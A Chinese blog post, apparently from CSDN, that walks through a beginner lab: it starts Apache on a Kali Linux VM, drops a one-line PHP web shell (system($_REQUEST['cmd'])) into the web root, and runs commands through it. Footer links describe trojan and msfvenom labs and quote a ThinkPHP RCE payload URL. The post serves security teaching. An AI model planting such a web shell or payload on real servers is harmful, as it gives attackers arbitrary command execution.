简单渗透实验——kali一句话木马实现远程操控

已于 2024-10-31 09:44:23 修改
阅读量1k 收藏 9
点赞数 17
文章标签: 网络安全 安全 远程工作
于 2024-10-30 23:39:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a250278984/article/details/143377556
版权

简单渗透实验——kali一句话木马实现远程操控

实验设备

一台装有Kali Linux虚拟机的电脑

实验步骤

一、开启Kali Linux 的apache

使用Kali的终端,输入代码

service apache2 start

如图请添加图片描述
二、apache服务开启后,可用物理机访问虚拟机的ip,我这里的ip是172.XX.XX.XX,在浏览器上访问,局部图如下请添加图片描述
三、在Kali的文件系统里面,/var/www/html/目录即为物理机访问的地址,正常情况下直接访问是进入的索引界面,既index.html,现在往虚拟机里面放入一个php文件,可以将其命名为shell.php文件内包含一句话代码:

<?php
system($_REQUEST ['cmd']);
?>

对这段代码分析:

<?php 和 ?>:

这是PHP代码的开头和结尾标记。所有在这之间的内容都将被PHP解释器执行。
system() 函数:
system() 是PHP中的一个函数,用于执行外部程序,并显示输出。它接受一个字符串参数,该字符串代表要执行的命令。
例如,system(‘ls -la’) 将在类Unix系统上列出当前目录的文件和目录。
$ _ REQUEST 数组:
$ _REQUEST 是一个包含了GET、POST和COOKIE数据的数组。这意味着,如果请求中包含名为cmd的GET参数、POST参数或COOKIE,其值都将被 $ _REQUEST[‘cmd’]获取。(注意半角全角)
例如,如果URL是http://example.com/page.php?cmd=ls -la,那么$_REQUEST[‘cmd’]的值将是ls -la。

请添加图片描述
请添加图片描述
四、这时候物理机已经完全可以骇入Kali了,可以通过访问shell.php来远程操控Kali,下面举例一些操控的例子:
1、通过使用ifconfig查看IP信息
在这里插入图片描述
2、通过echo 输出haha
在这里插入图片描述

扩展知识

Linux Apache服务详解
PHP数据接收变量$ _GET、$ _POST 、$_REQUEST区别

别彡
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另个主题——Cracer教程,第篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
热门推荐
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的篇文章,希望能够帮助到您!
使用Kali Linux系统生成木马病毒并实现远程控制计算机
2401_84578953的博客
09-21 2373
木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16(虚拟机)Kali Linux 2021(系统)
木马攻击实验
qq_59468802的博客
10-20 1102
实验简介 实验所属系列:系统安全攻防技术与实践 实验对象: 本科/专科信息安全专业 相关课程及专业:计算机基础,网络安全 实验时数(学分):2学时 实验类别:实践实验类 预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击甚至完全可能告知计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某端口监听来自控制端的控制信息。 1、木马的传统连接技术 木马都采用...
Metasploit实验之上传木马
最新发布
wjy的博客
03-12 1060
使用Metasploit创建木马并在靶机windows上运行
Kali网站配置 句话木马
cTHCYC的博客
01-02 593
这条命令用于进入 Apache 默认的网站目录。如果没有报错,说明该目录存在。
实验句话木马
2301_79638884的博客
10-29 555
在终端输入service apache2 start。添加木马并命名为shell.php。
kali-msfvenom生成远控木马
Ryongao
01-16 1361
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 6212
、File Upload(文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
渗透测试——CFS三层靶机渗透
抚琴
01-29 2356
是样个逻辑 nmap信息收集: nmap -T4 -O 192.168.1.107 http://192.168.1.107/public/ 看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞 payload: http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&var.
基于kali的域控环境搭建——黑盒测试环境搭建
kali_Ma的博客
12-28 2428
前言 本环境为黑盒测试,在不提供虚拟机帐号密码的情况下进行黑盒测试拿到域控里面的flag。 环境搭建 攻击机: kali:192.168.1.10 靶场: CentOS(内):192.168.93.100 CentOS(外):192.168.1.110 Ubuntu:192.168.93.120 域内主机: Winserver2012:192.168.93.10 Winserver2008:192.168.93.20 Windows7:192.168.93.30 kali跟CentOS能够ping通 拓扑
病毒实验木马病毒实验
12-06
了解木马程序的结构、传播方法、安装与自启动机制,加深木马病毒原理的认识;掌握木马病毒的查杀般方法。
基础木马实验
Goinhn
02-29 942
基础木马实验 使用大白鲨远程管理工具 实验环境 客户端:windows xp 服务端:windows server 2003 r2 本地攻击 启动大白鲨软件 配置程序 ip处设置为当前主机的ip地址 点击生成服务端: 可以对生成的服务端程序进行修改文件名和更换图标,使得更具有隐蔽性,生成之后在主机中进行点击出发木马程序: 客户端程序中出现该上线的主机,可以在客户端中进行些列的操作,...
句话木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 5818
前言 直以来,Java句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出种Java句话木马:利用Java中JS引擎实现句话木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
黑洞木马实验
qq_43717119的博客
06-22 1578
实验20 黑洞木马实验实验目的】 1、了解木马感染的手段 2、掌握利用木马的办法 【实验环境】 系统环境:2台windows 2003 实验工具:Blackhole(D:\攻防工具包\黑洞木马) EXE捆绑机(D:\攻防工具包\黑洞木马\EXE捆绑机) 【实验预备知识点】 1、 木马程序(Trojan horse program)通常称为木马,恶意代码等,是指潜伏在电脑中,可受外部用户控制以窃取本机信息或者控制权的程序。木马指的是特洛伊木马,英文叫做“Trojan horse”,其名称取自希腊神话的特洛
VMware win10虚拟机跑简单木马实验
m0_51478477的博客
06-14 1376
基于python实现简单木马实验:在客户端中读取服务端的文件,在VMware中跑通。
4.2 木马攻防实验
qq_55202378的博客
07-27 1802
木马攻防
句话木马
aarong的博客
11-26 504
简述 写个php脚本,实现简单的反向连接操作。 网络环境:NAT模式下的Kali、win2003server 操作过程 写好php代码保存至kali的网站目录/var/www/html,命名为shell.php <?php system($_REQUEST['cmd']);?> 开启apache服务 service apache2 start 在win2003...
文件上传渗透测试教程:从基础到高级
例如,他们会上传带有隐藏Webshell的句话木马图片,这种木马仅需行代码就能实现命令执行。 在实际渗透测试中,文件上传漏洞常常与SQL注入等其他攻击手法结合使用,以实现对目标系统的深度控制。学习这些技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值